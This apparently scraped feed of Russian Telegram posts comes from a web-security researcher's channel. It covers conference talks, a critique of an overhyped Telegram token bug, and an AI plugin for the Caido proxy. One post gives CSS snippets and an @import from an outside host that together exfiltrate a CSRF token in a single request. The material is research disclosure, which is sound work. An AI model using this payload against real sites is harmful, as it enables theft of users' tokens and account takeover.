Пост не по теме канала, но то что мне показалось очень важным
Есть такой человек - Андрей Викторович Столяров
Для тех кто не знал или забыл - он автор наверное одних из лучших книг по программированию на русском языке
Будучи ещё в школе я с радостью прочитал его книги
Сейчас узнал, что в потоке информационного шума пропустил очень важную новость - у него, к сожалению, обнаружили рак...
http://stolyarov.info/node/429
Пост я делаю не с целью обратить внимания или что-то вроде такого, а просто чтобы если кто-то вдруг как и я читал его книги (которые всегда были в бесплатном доступе) - не упустил сказать спасибо ему за все монетой.
Есть такой человек - Андрей Викторович Столяров
Для тех кто не знал или забыл - он автор наверное одних из лучших книг по программированию на русском языке
Будучи ещё в школе я с радостью прочитал его книги
Сейчас узнал, что в потоке информационного шума пропустил очень важную новость - у него, к сожалению, обнаружили рак...
http://stolyarov.info/node/429
Пост я делаю не с целью обратить внимания или что-то вроде такого, а просто чтобы если кто-то вдруг как и я читал его книги (которые всегда были в бесплатном доступе) - не упустил сказать спасибо ему за все монетой.
❤54😭11😱5
Спасибо Metamask за упоминание в последнем своем релизе
https://metamask.io/news/metamask-security-report
https://metamask.io/news/metamask-security-report
🔥37❤7✍5
Вчера как обычно сделал обычный пост в соц сети Илона Маска, который довольно сильно разошелся. Поэтому для тех кто читает только мой тг повторю тут.
Думаю многие знакомы с CSS exfiltration, а если нет можете прочитать статью 2 летней давности на portswigger
Основная идея тогда заключалась в том, чтобы с помощью CSS селекторов брутфорсить атрибуты тегов:
Например так можно украсть CSRF токен, однако атака довольно нестабильная, медленная и тд. Довольно плохо реализуема.
Однако я обнаружил, что начиная с Chrome 133 произошло важное изменение в функции CSS attr, раньше она могла использоваться только с content property, теперь же вы можете использовать её вместе с переменными CSS (https://developer.chrome.com/blog/advanced-attr):
Однако мы не можем использовать такое внутри url:
Браузер просто проигнорирует такой property как неверный
Однако на помощь опять спешат новые стандарты CSS, чтобы добиться успеха достаточно использовать
После чего просто сохраняете стиль с кражей нужного поля (например атрибута value у тега input с именем csrf-token)
И делаете
После чего, как можно увидеть на скриншоте, через один запрос вы получите полное значение атрибута тега
Думаю многие знакомы с CSS exfiltration, а если нет можете прочитать статью 2 летней давности на portswigger
Основная идея тогда заключалась в том, чтобы с помощью CSS селекторов брутфорсить атрибуты тегов:
input[value^="a"] {
--starts-with-a:url(/startsWithA);
}Например так можно украсть CSRF токен, однако атака довольно нестабильная, медленная и тд. Довольно плохо реализуема.
Однако я обнаружил, что начиная с Chrome 133 произошло важное изменение в функции CSS attr, раньше она могла использоваться только с content property, теперь же вы можете использовать её вместе с переменными CSS (https://developer.chrome.com/blog/advanced-attr):
form {
--val: attr(csrf-token);
}--val будет содержать содержать значение атрибута csrf-tokenОднако мы не можем использовать такое внутри url:
form {
--val: attr(csrf-token);
background: url(var(--val)); /* Correct */
}Браузер просто проигнорирует такой property как неверный
Однако на помощь опять спешат новые стандарты CSS, чтобы добиться успеха достаточно использовать
image-setform {
--val: attr(csrf-token);
background: image-set(var(--val)); /* Correct */
}После чего просто сохраняете стиль с кражей нужного поля (например атрибута value у тега input с именем csrf-token)
И делаете
@import с атакуемой страницы :@import url(https://pocs.neplox.security/css-2025-exfiltration.css);
После чего, как можно увидеть на скриншоте, через один запрос вы получите полное значение атрибута тега
🔥51👍8👏8🤯5
Заметки Слонсера
👀
Доклад услышал Токио и Сеул
Теперь можно с радостью объявить, что его в самой новой версии услышит Москва на Positive Hack Days 22 мая.
Теперь можно с радостью объявить, что его в самой новой версии услышит Москва на Positive Hack Days 22 мая.
🔥65💘7👍4
Последнее время начали распространять довольно странный материал, примеров много но прикреплю один - https://news.1rj.ru/str/innostage_group/2274
В чем суть, люди пишут о магическом эксплойте виджета телеграмм:
Суть атаки заключается по описанию в том что телеграм при логине через widget передает auth code через fragment как-то так:
И тут началось безумие, насколько я понимаю началось все с недавней статьи на хакере https://xakep.ru/2025/04/22/telegram-widget-bug/
Начнем с того что об этом упоминалась уже 11 месяцев назад в статье - https://lyra.horse/blog/2024/05/stealing-your-telegram-account-in-10-seconds-flat (Там кстати более реальный кейс атаки, но только при физическом доступе к устройству )
А теперь начнем с того как это начали раздувать, на примере того что выпустил Innostage:
1.
.
Без XSS на web.telegram.org вы не сможете получить fragment, а если у вас есть XSS на web.telegram.org, то существует более простые атаки, как минимум вы можете просто прочитать localStorage (Не перепроверял, но раньше telegram не хендлил проверку на то что сессия между устройствами перекинулась)
2.
Если расширение читает URL на который перешел пользователь, скорее всего у него просто есть возможность запускаться в контексте contentScript, следовательно он может просто выполнить те же самые действия что и в контексте XSS. Полезного тут мало.
3.
На web.telegram.org включен
Браузер будет пытаться всегда установить соединение через
4.
Тут тоже особо не добавляет новой поверхности атаки, при таком доступе и возможности чтения памяти, есть более простые вектора атак
5.
Действительно единственный рабочий сценарий, который однако требует физического доступа и просто упрощает атаку, а не вводит что-то новое.
В целом резюмирую. Из реальных векторов - упрощение атаки при физическом доступе к разблокированному устройству. Можно было бы наверное всем так писать, но к сожалению это не вызывало бы такого ажиотажа и классов в соц сетях
Не знаю зачем люди так делают, особенно компании. Но это хорошо показывает их уровень экспертизы
P.S. Советую заглядывать в таких случаях дальше хедера статьи, а не плодить панику у людей (особенно не связанных с ИБ) на пустом месте
В чем суть, люди пишут о магическом эксплойте виджета телеграмм:
Суть атаки заключается по описанию в том что телеграм при логине через widget передает auth code через fragment как-то так:
https://web.telegram.org/#/login?auth_token=eyJhbGciOi...
И тут началось безумие, насколько я понимаю началось все с недавней статьи на хакере https://xakep.ru/2025/04/22/telegram-widget-bug/
Начнем с того что об этом упоминалась уже 11 месяцев назад в статье - https://lyra.horse/blog/2024/05/stealing-your-telegram-account-in-10-seconds-flat (Там кстати более реальный кейс атаки, но только при физическом доступе к устройству )
А теперь начнем с того как это начали раздувать, на примере того что выпустил Innostage:
1.
Мошенники создают специально подготовленные веб-сайты, содержащие
внедрённый JavaScript-код, который автоматически извлекает токен из
URL-адреса после перенаправления на web.telegram.org.
.
Без XSS на web.telegram.org вы не сможете получить fragment, а если у вас есть XSS на web.telegram.org, то существует более простые атаки, как минимум вы можете просто прочитать localStorage (Не перепроверял, но раньше telegram не хендлил проверку на то что сессия между устройствами перекинулась)
2.
Расширения, установленные в браузере пользователя, отслеживают все
посещаемые URL. При обнаружении параметра auth_token= происходит
автоматическое извлечение токена и его передача на сервер
злоумышленника.
Если расширение читает URL на который перешел пользователь, скорее всего у него просто есть возможность запускаться в контексте contentScript, следовательно он может просто выполнить те же самые действия что и в контексте XSS. Полезного тут мало.
3.
В незашифрованных или скомпрометированных сетях злоумышленники
используют MITM-атаки, прокси-перехват, DNS-спуфинг и другие методы
для анализа трафика и перехвата авторизационных токенов.
На web.telegram.org включен
Upgrade-Insecure-Requests: 1
Браузер будет пытаться всегда установить соединение через
https, что уменьшает возможность атаки в публичных сетях. Ну и остальное тоже не очень релевантно, реально украсть аккаунт на расстоянии невозможно4.
Заражённые приложения могут получить доступ к истории браузера,
системным логам или оперативной памяти, откуда извлекаются токены.
Тут тоже особо не добавляет новой поверхности атаки, при таком доступе и возможности чтения памяти, есть более простые вектора атак
5.
При краткосрочном несанкционированном доступе к разблокированному
устройству, злоумышленник может вручную открыть ссылку во
встроенном браузере Telegram и скопировать токен из адресной строки.
Действительно единственный рабочий сценарий, который однако требует физического доступа и просто упрощает атаку, а не вводит что-то новое.
В целом резюмирую. Из реальных векторов - упрощение атаки при физическом доступе к разблокированному устройству. Можно было бы наверное всем так писать, но к сожалению это не вызывало бы такого ажиотажа и классов в соц сетях
Не знаю зачем люди так делают, особенно компании. Но это хорошо показывает их уровень экспертизы
P.S. Советую заглядывать в таких случаях дальше хедера статьи, а не плодить панику у людей (особенно не связанных с ИБ) на пустом месте
Telegram
Innostage
⚡️В браузере Telegram нашли опасную уязвимость
Знакомый прислал в мессенджере сообщение со ссылкой, и вы её открыли? Это могла быть ссылка на голосование, опрос, регистрацию или любую другую привычную страницу. Но если она была вредоносной и открылась во…
Знакомый прислал в мессенджере сообщение со ссылкой, и вы её открыли? Это могла быть ссылка на голосование, опрос, регистрацию или любую другую привычную страницу. Но если она была вредоносной и открылась во…
🔥28👍19❤9🍓5💯4
Там оказывается открыли регистрацию на Pentest Award.
В этом году нормально так категорий, да и призов обещают много. В целом идейно круто, так как рассказ об атаке в свободной форме с сокрытием деталей - классный формат.
В том году был довольно позитивный фидбек от тех кого я знаю, поэтому если кто пропустил - советую поучаствовать.
https://award.awillix.ru/
В этом году нормально так категорий, да и призов обещают много. В целом идейно круто, так как рассказ об атаке в свободной форме с сокрытием деталей - классный формат.
В том году был довольно позитивный фидбек от тех кого я знаю, поэтому если кто пропустил - советую поучаствовать.
https://award.awillix.ru/
award.awillix.ru
Awillix Award 2025
Первая в России ежегодная независимая премия для пентестеров.
🤡18🔥12💅7🤮5💩5
Ребята из CTBP сделали довольно классный разбор моей последней техники, которая взорвала соцсеть Y
https://www.youtube.com/watch?v=Ae4cR00P9LU
https://www.youtube.com/watch?v=Ae4cR00P9LU
YouTube
Slonser's Image Injection 0-day - ATO & New Caido Collab Plugin (Ep. 121)
Episode 121: In this episode of Critical Thinking - Bug Bounty Podcast we catch up on a bunch of news and research.
Follow us on twitter at: https://x.com/ctbbpodcast
Got any ideas and suggestions? Feel free to send us any feedback here: info@criticalt…
Follow us on twitter at: https://x.com/ctbbpodcast
Got any ideas and suggestions? Feel free to send us any feedback here: info@criticalt…
🔥52👍7🤡2
Заметки Слонсера
Ребята из CTBP сделали довольно классный разбор моей последней техники, которая взорвала соцсеть Y https://www.youtube.com/watch?v=Ae4cR00P9LU
Не долго музыка играла, не долго слонсер танцевал
Но люди успели успели заработать на H1)
Но люди успели успели заработать на H1)
😁28🤪4❤2
Сегодня в 12:00 приходите на наш доклад на PHD в треке offensive ( зал 25, POPOV )
Для тех кто не придет ногами, можно будет смотреть трансляцию
https://phdays.com/ru/forum/broadcast/?selectedTagSlug=offense
P.S. Для трёх лучших вопросов мы приготовили специальные подарки, так что любители подушить вопросами тоже приглашаются
Ждём всех через полтора часа!
Для тех кто не придет ногами, можно будет смотреть трансляцию
https://phdays.com/ru/forum/broadcast/?selectedTagSlug=offense
P.S. Для трёх лучших вопросов мы приготовили специальные подарки, так что любители подушить вопросами тоже приглашаются
Ждём всех через полтора часа!
👍14🔥8🥰2😢2🤣1
Forwarded from blog.z3r.ru
Сегодня на PHDays буду рассказывать про особенность Apport, которая позволяет при определенных конфигурациях системы сделать LPE. Более подробный разбор можно почитать в блоге.
blog.z3r.ru
Apport Lpe
Investigating a local privilege escalation vulnerability in Ubuntu’s Apport crash reporting system.
🔥9❤7😱3
Forwarded from InfoSec VK Hub
This media is not supported in your browser
VIEW IN TELEGRAM
⚡️ VK Security Confab:
регистрация открыта!
🔹 Встречаемся 3 июля в офисе VK «У Красного моста».
Программа митапа:
🔹 Харденинг GitLab на примере ВКонтакте, Дмитрий Земляков (VK)
🔹 Автоматизация поиска IDORов с помощью DAST, Андрей Кан (Ozon Fintech)
🔹 Атака одним пакетом: про новый метод Race Condition, Никита Распопов (VK)
🔹 100.000 оттенков JS: от DoS до кражи денег, Всеволод Кокорин (SolidLab)
🔹 Эпичная летняя афтепати!
🔹 Подробнее о темах — на странице митапа.
Зарегистрироваться
🔹 Только офлайн. Количество мест ограничено!
VK Security | Буст этому каналу
#confab #митап #appsec
регистрация открыта!
Программа митапа:
Зарегистрироваться
VK Security | Буст этому каналу
#confab #митап #appsec
Please open Telegram to view this post
VIEW IN TELEGRAM
👍9🔥5🥰1
Думаю многим багхантерам знакома ситуация когда нашел Self-XSS и её не сдать по правилам программы
Используя современные возможности браузеров я попытался исправить эту ситуацию
Читайте в моем последнем ресерче
https://blog.slonser.info/posts/make-self-xss-great-again/
Используя современные возможности браузеров я попытался исправить эту ситуацию
Читайте в моем последнем ресерче
https://blog.slonser.info/posts/make-self-xss-great-again/
blog.slonser.info
Make Self-XSS Great Again
Disclaimer: This article is intended for security professionals conducting authorized testing within the scope of a contract. The author is not responsible for any damage caused by the application of the provided information. The distribution of malicious…
18🔥36👍18❤2❤🔥2🙏1
Ровно 2 месяца не писал в канал, так что в качестве извинений дропаю тулзу
2 самых используемых прокси - Burp и Caido, пытаются идти со временем и добавляют AI фичи в свои продукты. Однако сейчас они выглядят довольно странно, фактически не позволяют передать флоу полностью в AI, сделать интеграции с другими MCP
Поэтому я написал плагин для Caido, который позволяет подключать его в качестве программы в Claude.
Например можно написать:
"Отфильтруй запросы к такому то хосту за такие-то даты, содержащие то и то. Разбей их на replay колекции и переименуй исходя из смысла"
И получить набор проименновых и структурированных запросов отправленных в reply
Но что самое главное - остальные MCP ваши тулзы будут работать так же вместе с плагином (базово например поиск в вебе, поиск по спекам и тд)
Что позволит запускать проект и уходить на 20 минут по AI разметит весь проект)
https://github.com/Slonser/Ebka-Caido-AI
2 самых используемых прокси - Burp и Caido, пытаются идти со временем и добавляют AI фичи в свои продукты. Однако сейчас они выглядят довольно странно, фактически не позволяют передать флоу полностью в AI, сделать интеграции с другими MCP
Поэтому я написал плагин для Caido, который позволяет подключать его в качестве программы в Claude.
Например можно написать:
"Отфильтруй запросы к такому то хосту за такие-то даты, содержащие то и то. Разбей их на replay колекции и переименуй исходя из смысла"
И получить набор проименновых и структурированных запросов отправленных в reply
Но что самое главное - остальные MCP ваши тулзы будут работать так же вместе с плагином (базово например поиск в вебе, поиск по спекам и тд)
Что позволит запускать проект и уходить на 20 минут по AI разметит весь проект)
https://github.com/Slonser/Ebka-Caido-AI
🔥39❤9👍8💩3😁2
Заметки Слонсера
Ровно 2 месяца не писал в канал, так что в качестве извинений дропаю тулзу 2 самых используемых прокси - Burp и Caido, пытаются идти со временем и добавляют AI фичи в свои продукты. Однако сейчас они выглядят довольно странно, фактически не позволяют передать…
Ebka AI официально доступен через Caido Store!
MCP полностью проработан и протестирован с Claude/Cursor
Для опенсорс проектов - теперь можете написать прямо в IDE
"Создай Replay коллекции под каждый модуль приложения и наполни их запросами"
"Модифицируй запрос X исходя из функциональности в методе Y"
Так же если пишите сложный эксплойт, курсор опять таки сможет брать информацию которая ему нужна прямо из прокси Caido.
Так же он может создавать Match/Replace rules, работать со scope, findings и тд
Фактически предоставляет вашему AI полный доступ к вашему инстансу Caido
P.S.
Так как курсор поддерживает локальные модели, теперь можно использовать плагин с ними, если вам не нужно чтобы данные улетали на чужие сервера
MCP полностью проработан и протестирован с Claude/Cursor
Для опенсорс проектов - теперь можете написать прямо в IDE
"Создай Replay коллекции под каждый модуль приложения и наполни их запросами"
"Модифицируй запрос X исходя из функциональности в методе Y"
Так же если пишите сложный эксплойт, курсор опять таки сможет брать информацию которая ему нужна прямо из прокси Caido.
Так же он может создавать Match/Replace rules, работать со scope, findings и тд
Фактически предоставляет вашему AI полный доступ к вашему инстансу Caido
P.S.
Так как курсор поддерживает локальные модели, теперь можно использовать плагин с ними, если вам не нужно чтобы данные улетали на чужие сервера
🤣23🔥15👍4❤3👎1